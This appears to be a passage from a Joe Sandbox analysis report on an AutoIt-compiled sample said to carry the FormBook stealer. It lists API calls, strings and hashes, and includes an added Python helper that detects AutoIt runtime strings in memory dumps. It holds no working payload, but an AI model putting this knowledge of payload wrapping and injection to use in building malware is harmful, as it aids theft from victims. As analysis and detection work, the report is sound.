                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                        • API String ID: 3948761352-1609664196
                                                                                                        • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                        • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                        • _wcscat.LIBCMT ref: 00427541
                                                                                                        • _wcslen.LIBCMT ref: 00427551
                                                                                                        • _wcslen.LIBCMT ref: 00427562
                                                                                                        • _wcscat.LIBCMT ref: 0042757C
                                                                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                        • String ID: Include$\
                                                                                                        • API String ID: 3173733714-3429789819
                                                                                                        • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                        • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

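The two function listings above are the AutoIt v3 runtime locating its script environment: the first builds a path from GetModuleFileNameW via __wsplitpath/_wcsncat/__wmakepath (the "Include" string) and falls back to RegOpenKeyExW on HKEY_CURRENT_USER (0x80000001) with the key Software\AutoIt v3\AutoIt; the GUI functions further down register the window classes "AutoIt v3 GUI" and "AutoIt v3". Together they show the submitted file is an AutoIt-compiled executable carrying the FormBook payload. The following triage helper, an added example that is not Joe Sandbox, AutoIt or the sample's own code, searches a raw dump region for exactly those UTF-16LE literals (the runtime uses the W API variants, so the strings are wide in memory) and reports their virtual addresses. The indicator set, the constructed test dump and the image base are assumptions drawn from this report, not from the AutoIt project.

```python
"""Scan a memory-dump region or PE file for the AutoIt v3 runtime strings
listed in this report. Added example; not Joe Sandbox, AutoIt or sample code."""
from __future__ import annotations

import sys

# Indicators taken from the API/String listings in this report. The runtime
# passes them to RegOpenKeyExW / RegisterClassExW, so they sit in memory as
# UTF-16LE. Each needle is NUL-terminated so that "AutoIt v3" does not also
# match inside "AutoIt v3 GUI" or inside the registry key.
AUTOIT_INDICATORS = {
    "registry key HKCU\\Software\\AutoIt v3\\AutoIt": "Software\\AutoIt v3\\AutoIt",
    "window class 'AutoIt v3 GUI'": "AutoIt v3 GUI",
    "window class 'AutoIt v3'": "AutoIt v3",
}


def _wide_needle(text: str) -> bytes:
    return text.encode("utf-16-le") + b"\x00\x00"


def find_indicators(data: bytes, region_base: int = 0x401000) -> dict[str, list[int]]:
    """Return {indicator label: [virtual addresses]} for every hit in data.

    region_base is the virtual address where the scanned bytes were mapped;
    0x401000 is the start of the .sdmp region listed as Source File above
    (assumption: the caller passes that region, not the whole image)."""
    hits: dict[str, list[int]] = {}
    for label, text in AUTOIT_INDICATORS.items():
        needle = _wide_needle(text)
        pos, found = 0, []
        while (pos := data.find(needle, pos)) != -1:
            found.append(region_base + pos)
            pos += len(needle)
        if found:
            hits[label] = found
    return hits


def is_autoit_compiled(data: bytes) -> bool:
    """Heuristic: the runtime's registry key plus at least one of its window
    class names. Either alone is weak (scripts and installers mention the
    key); both together are the runtime itself."""
    hits = find_indicators(data)
    return any(k.startswith("registry") for k in hits) and any(
        k.startswith("window class") for k in hits
    )


def constructed_dump() -> bytes:
    """Constructed stand-in for a dump region (not bytes from the sample):
    0x100 bytes of padding, then the three indicators plus an unrelated
    wide string, each followed by filler."""
    blob = bytearray(b"\x00" * 0x100)
    for s in ("Software\\AutoIt v3\\AutoIt", "AutoIt v3 GUI", "AutoIt v3", "TaskbarCreated"):
        blob += _wide_needle(s) + b"\xcc" * 7
    return bytes(blob)


if __name__ == "__main__":
    # Usage: python autoit_triage.py <dump.sdmp> [region_base_hex]
    if len(sys.argv) >= 2:
        with open(sys.argv[1], "rb") as fh:
            raw = fh.read()
        base = int(sys.argv[2], 16) if len(sys.argv) > 2 else 0x401000
    else:
        raw, base = constructed_dump(), 0x401000
    for label, addrs in find_indicators(raw, base).items():
        print(f"{label}: " + ", ".join(f"0x{a:08x}" for a in addrs))
    print("AutoIt-compiled:", is_autoit_compiled(raw))
```

Run it against the downloaded 0x401000 .sdmp region with the base shown in the Source File line; on a plain PE file pass the file offset base instead, or 0 to get raw offsets. The heuristic is deliberately narrow: it confirms the AutoIt wrapper seen in this report, it says nothing about the FormBook payload, which is only reached after the wrapper decrypts and injects it.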
                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • _fseek.LIBCMT ref: 0045292B
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                        • _fseek.LIBCMT ref: 004529BF
                                                                                                        • _malloc.LIBCMT ref: 004529CA
                                                                                                        • _malloc.LIBCMT ref: 004529D6
                                                                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                        • _free.LIBCMT ref: 00452A17
                                                                                                        • _free.LIBCMT ref: 00452A20
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1255752989-0
                                                                                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                        • String ID: FILE
                                                                                                        • API String ID: 3888824918-3121273764
                                                                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                        • ImageList_ReplaceIcon.COMCTL32(0099ED78,000000FF,00000000), ref: 00410552
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(0099ED78,000000FF,00000000), ref: 00410552
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                        • API String ID: 423443420-4155596026
                                                                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _malloc
                                                                                                        • String ID: Default
                                                                                                        • API String ID: 1579825452-753088835
                                                                                                        • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                        • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph (rendered graph omitted): entry block 40f5c0-40f5cf calls 422240; the function also calls 413650, 410e60, 414d04, 4150d1 and 414d30; its basic blocks span 40f5c0-40f6df with an out-of-line tail at 425d05-425d5f (executed and not-executed blocks are only distinguished in the rendered image).
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                        • String ID: AU3!$EA06
                                                                                                        • API String ID: 1268643489-2658333250
                                                                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                                                        Control-flow Graph
                                                                                                        APIs
                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                        • String ID: TaskbarCreated
                                                                                                        • API String ID: 129472671-2362178303
                                                                                                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                        Control-flow Graph
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 004115F1
                                                                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                        • std::exception::exception.LIBCMT ref: 00411626
                                                                                                        • std::exception::exception.LIBCMT ref: 00411640
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                        • String ID: ,*H$4*H$@fI
                                                                                                        • API String ID: 615853336-1459471987
                                                                                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                                                        Control-flow Graph
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0454E709
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0454E92F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1293200948.000000000454C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0454C000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_454c000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileFreeVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 204039940-0
                                                                                                        • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                        • Instruction ID: bdce655d83881d277c40ef0a8b5635274a4771f1de221faeaafd72e9181a933e
                                                                                                        • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                                        • Instruction Fuzzy Hash: 91A11870E00209EBDF14CFA4D899BEEB7B5BF88318F208559E511BB280D775AA41EF54

                                                                                                        Control-flow Graph
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
